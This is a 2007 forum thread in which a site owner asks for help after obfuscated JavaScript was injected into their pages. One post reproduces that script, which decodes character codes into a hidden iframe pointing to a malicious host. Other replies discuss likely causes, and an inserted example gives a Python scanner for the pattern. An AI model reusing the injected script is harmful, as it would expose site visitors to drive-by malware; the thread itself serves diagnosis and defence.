Malicious Code in my Web Pages!!
Illusive
07-21-2007, 05:56 PM
Before you click any links in this message, be aware that some malicious code tries to run on these links!!!
I am losing my mind over this! I am soooooooo glad I finally found this site again! I have had to wipe out my computer etc... and lost this place, so I started asking in another forum and have yet to get any real answers there! Basically my host says it is my problem. When going to some of my webpages, I get virus alerts from my AVG etc... Some malicious code or something is making my webpages try to send viruses and whatever else... 8( I received an email from a person saying that www.midatlanticwrestling.com tries to redirect him to some virus or something. My AVG gives me a warning when I go to that page also. I have uploaded my original index page and think it stopped it for now. I had downloaded the bad index page and my computer would not even let me open it. :(
Now on another site, same type problem, I uploaded my original index page, but it looks as if code has been written to that page right after it was uploaded!
Can I put the html on here? First the original, then the changed html? Don't want to cause problems on here. The website that is doing this is www.loc-jk2.com.
Please let me know what I should do to fix this and to keep these frikin losers from continuing to ruin my sites, I am sure I am losing people every day to this crud. 8(
Thank you in advance.
DaMorbid1
Illusive
07-22-2007, 10:26 AM
Please anyone! I am losing many customers and faithful visitors!
Anyone know where to get answers?
Also here is a screenshot of the warning I get when going to several of my websites:
Illusive
07-23-2007, 08:57 AM
wow, thought more would know about this here, oh well, only problem is I am losing visitors daily, I am 90% sure this is being done on my host, not from my puter....
OneEyedBandit
07-23-2007, 09:55 AM
I just went through the whole site and I got no warnings / unwanted redirections
I have to say this though, I really like the introduction movie on http://www.loc-jk2.com/
normally i just close the window when I get some annoying movie clip but i really enjoyed that one.
If you coded your HTML files by hand and know exactly what's in it (ie no dodgy stuff :P) then I would have to say it's a server side problem.
More information about that Virus:
The Trojan is a Java Script script which is built in to HTML pages. It is 17,002 bytes in size.
I can't help out no more than that, I'm sorry you're having troubles though
GarrettW
07-26-2007, 03:23 PM
i went to both sites and experienced nothing out of the ordinary.
except for the fact that http://www.loc-jk2.com/ is just a page full of php errors and nothing else.
Illusive
07-27-2007, 02:31 PM
i went to both sites and experienced nothing out of the ordinary.
except for the fact that http://www.loc-jk2.com/ is just a page full of php errors and nothing else.
That's just it, there is nothing PHP on that site!! I deleted the index.html page to make a point, instead of the usual directory you get when the index page is not there, I get these PHP errors, why? I am thinking that it's what is causing the malicious code, a PHP script connected to my index pages somehow (about 30 of them) and writes the code that's causing all the problems, what you think people?
Any errors that used to be on my sites have been fixed for now, if anyone likes I can upload the malicious coded pages to my servers somewhere and link you to them if you would like to see what it was, or post the html that was on those pages, just put something on there so that the code doesn't execute......
GarrettW
07-27-2007, 02:45 PM
so what files are in your public_html folder now?
Illusive
07-28-2007, 10:53 AM
Well I have numerous files, That site is not the default site of that server.
I have probably 20-30 sites on that server now, but I will look at the folder to see if any files I don't recognize are in there.
Nothing out of the ordinary in there, I do have a forum for this website but it shouldn't have anything to do with deleting the index.html page should it?
I mean people are baffled here and I am sure it is something simple, I am thinking someone is attacking through the forums maybe since this page shows up like it does when deleting that index.html page.
I have to finger this out asap, I now even have "this site can be harmful" warnings coming up on google, losing customers daily.
BTW, Would you like me to post a copy of the index.html page somewhere that still has that malicious code in it? I would think that would be a great source of info...
If so, how do I post it on my server somewhere and disable the code, use slash marks?
GarrettW
07-28-2007, 02:00 PM
you could just post it on here. just put [code] [ /code] tags around it so that it's easier to read (minus that space i put in there).
Illusive
07-29-2007, 09:16 AM
//////////<head>
/<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
/<title>Untitled Document</title>
/</head>
/<frameset rows="198,297*" cols="*" framespacing="0" frameborder="no" /border="0">
/<frame src="top.html" name="topFrame" scrolling="No" noresize="noresize" id="topFrame" />
/<frame src="main.html" name="mainFrame" id="mainFrame" />
/</frameset>
/<noframes><body><!-- o4 --><script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046 119';
s=s+'11504710210809711510404710511010010112004611210411203403211910510011610406105303210410110510310 4116';
s=s+'06105303211511612110810106103410010511511210809712105811011111010103406206004707307008206507706 9062';
s=s+'032';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>
/<!-- c4 -->
/</body>
That is the code that was found in many of my index.html pages, and was not put there by me......
Of course I added the forward slashes for safety, I reckon lol.....
GarrettW
07-29-2007, 02:19 PM
the code writes an <iframe> to the page whose src is "http://simocrogger.ws/flash/index.php".
so ya, it could be malicious code.
and about the slashes: putting those in the HTML does nothing, but if you put two at the start of every line of Javascript, it will disable that.
edit:
i did google "illusive fantasy" and i found several of the sites you've made (not bad from a graphics standpoint, either!), and almost all of them said "this site may be harmful" blah blah blah. but i checked their code and i didn't see anything that should cause something like that.
are all of those sites hosted on the same server (or host)?
Illusive
07-30-2007, 02:15 PM
Yes they are hosted on 2 different accounts, but same host.
Ya that neat little warning from google is the new stopbadware.com answer to harmful websites, even though we are not responsible for this, a hacker did it, we have to suffer with this warning sometimes for months, losing rankings that took a lot of hard work, we have been trying to get them to do something less "intrusive" I guess, this really kills us, would be different if they notified us, gave us 24hrs or something then removed the warning when the site was clean, but I have heard some people have had the warning on for months.
As a matter of fact you can look here http://groups.google.com/group/stopbadware/browse_thread/thread/2a00cc76cd0c3380
and see some of the topics being discussed, get involved before this happens to you or anyone else, it's really a nightmare!
I have asked for the removal of the warnings once the sites were clean, but still the warning keeps visitors away... 8(
Thanks
BTW, Thanks for the comments on my graphics, I wish I had taken more time with coding etc, I love doing the graphic part but let DreamWeaver do the code.
I am fully self taught and now with my latest site, www.midatlanticwrestling.com I am getting a lot of calls for website and graphic work.
But of course that site will probably lose its great rankings due to the ol "warning" from Google... 8(
scoutt
08-02-2007, 08:10 AM
I didn't see anything wrong either. But if you see code in your html documents then somebody has your password and is logging into your ftp and uploading the code. Change all passwords and don't give them out. Then if you see it happening again then somebody at the server is doing it. Or somebody has another way into your account.
GarrettW
08-02-2007, 10:06 AM
@Illusive: i'd be interested to know, who's your host?
BillyGalbreath
08-02-2007, 11:08 AM
Has anyone thought about the host injecting ads? I see this type of thing all the time - mostly just causes validation problems, but I can see how a host could be injecting malicious code into your site.
As mentioned before, it could also be that someone is logging in as you and editing the files manually.
Suggestions:
Change your login password - use a strong password if possible. Then fix your code on all pages. If your code immediately contains this malicious crap again (using "View Source" from your browser's menu) then it is definitely your host injecting crap. If it's not there immediately, but shows up again later, then it's definitely someone else logging in to your account. If you suspect the host, switch hosts asap.
This is yet another reason why I run all my servers from home. I used to work in a datacenter and most of our clients were smaller hosting companies and I can even begin to tell you how much malicious crap I've seen these people do. Hell, even the company I worked for had its share of malicious crap. Never fully trust your host - all they want is your money. ;)
Illusive
08-03-2007, 03:32 PM
I have had the same host for 4-5 years but am changing very soon, I have had issues with them a lot, a lot, a whole lot actually... lol...
Since being tagged by Google now I have been able to research this a lot more, these people can inject malicious code from just about anywhere.
YOU WOULD BE WELL WARRANTED, EVERYONE TO CHECK YOUR ENTIRE SITES ASAP!!!!!!!!!
It is quite controversial also, everyone needs to get in on this, I myself lost valuable rankings, visitors etc...
Read it all here, believe me it's worth your time! Tell all webmasters you know also!
http://groups.google.com/group/stopbadware
http://groups.google.com/group/stopbadware/browse_thread/thread/2a00cc76cd0c3380
Believe me, I thought I was doing everything I could to be safe, and most of my sites are just gaming clans etc...
Please make sure you look at this and check your sites asap!
Illusive
08-03-2007, 03:38 PM
oops, posted twice sry.
GarrettW
08-03-2007, 03:50 PM
what i wonder is how this is happening. as in, where's the vulnerability?
BillyGalbreath
08-03-2007, 03:54 PM
what i wonder is how this is happening. as in, where's the vulnerability?
The main vulnerability is Internet Explorer. No, using another browser is not going to stop the malicious code from appearing in your code, but 99% of this code is targeted to take advantage of the Internet Explorer exploits, thus using something besides IE will greatly diminish your odds of being affected by the malicious code. ;)
Illusive
08-04-2007, 10:03 AM
I believe the place they were getting in on me was my PHP forums etc...
Seems that is where most hackers get in, MYSQL, PHP exploits etc...
I am still trying to find a way to scan my sites daily to see if any malicious code has been injected somehow, there must be a way to check for this daily to catch these people asap!
Any ideas on software scanners that may help?
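Added example, not part of the original thread: a static check for the injection pattern posted above, covering both the decoding GarrettW describes and the daily scan asked about here. It decodes the three-digit character codes without running the script and reports any iframe URL they hide; the function names and the sample page (built with a harmless placeholder URL) are assumptions constructed for illustration.

```python
import re
from pathlib import Path

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
DIGITS_RE = re.compile(r"""['"]([\d\s]{9,})['"]""")   # quoted runs of digits
IFRAME_SRC_RE = re.compile(r"""<iframe\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def decode_decimal_payload(digits: str) -> str:
    """Decode 3-digit decimal character codes; nothing is executed."""
    digits = re.sub(r"\s+", "", digits)      # forum word-wrap may insert spaces
    out = []
    for i in range(0, len(digits) - 2, 3):
        code = int(digits[i:i + 3])
        if code > 191:                       # the posted script adds 848 above 0xBF
            code += 848
        out.append(chr(code))
    return "".join(out)


def hidden_iframes(html: str) -> list[str]:
    """Iframe URLs that scripts in `html` would write from encoded strings."""
    urls = []
    for body in SCRIPT_RE.findall(html):
        if "fromCharCode" not in body:
            continue
        payload = "".join(DIGITS_RE.findall(body))
        urls += IFRAME_SRC_RE.findall(decode_decimal_payload(payload))
    return urls


def scan_tree(root: str) -> dict[str, list[str]]:
    """Map each page under `root` to the hidden iframe URLs found in it."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".html", ".htm", ".php"}:
            found = hidden_iframes(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits


# Constructed sample: same encoding scheme, harmless placeholder URL.
SAMPLE_MARKUP = '<iframe src="http://injected.example/x.php" width=5 height=5></iframe>'
SAMPLE_PAGE = ("<html><body><script>var s='';s+='"
               + "".join(f"{ord(c):03d}" for c in SAMPLE_MARKUP)
               + "';/* loop calling String.fromCharCode omitted */</script></body></html>")
```

Run `scan_tree` from a scheduled job against a local copy of the site and alert on any non-empty result; it only recognises this one encoding, so an empty result does not prove a page is clean.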
scoutt
08-04-2007, 10:47 AM
I believe the place they were getting in on me was my PHP forums etc...
Seems that is where most hackers get in, MYSQL, PHP exploits etc...
I don't think so. You cannot use php or mysql exploit to alter just a file. If they are getting in from your forums then time to change your forums. It is not as easy as you think. To alter just one file they have to know your user/password to your ftp, or they planted a backdoor on your server then your server is not very secure. Don't blame it on php or mysql as they are just the underlying on all your apps they use to get in? If they got in that way.
I bet they have an ftp login.
GarrettW
08-04-2007, 09:00 PM
The main vulnerability is Internet Explorer. No, using another browser is not going to stop the malicious code from appearing in your code, but 99% of this code is targeted to take advantage of the Internet Explorer exploits, thus using something besides IE will greatly diminish your odds of being affected by the malicious code. ;)
yea ... umm ... guess i should have specified. i meant server vulnerability.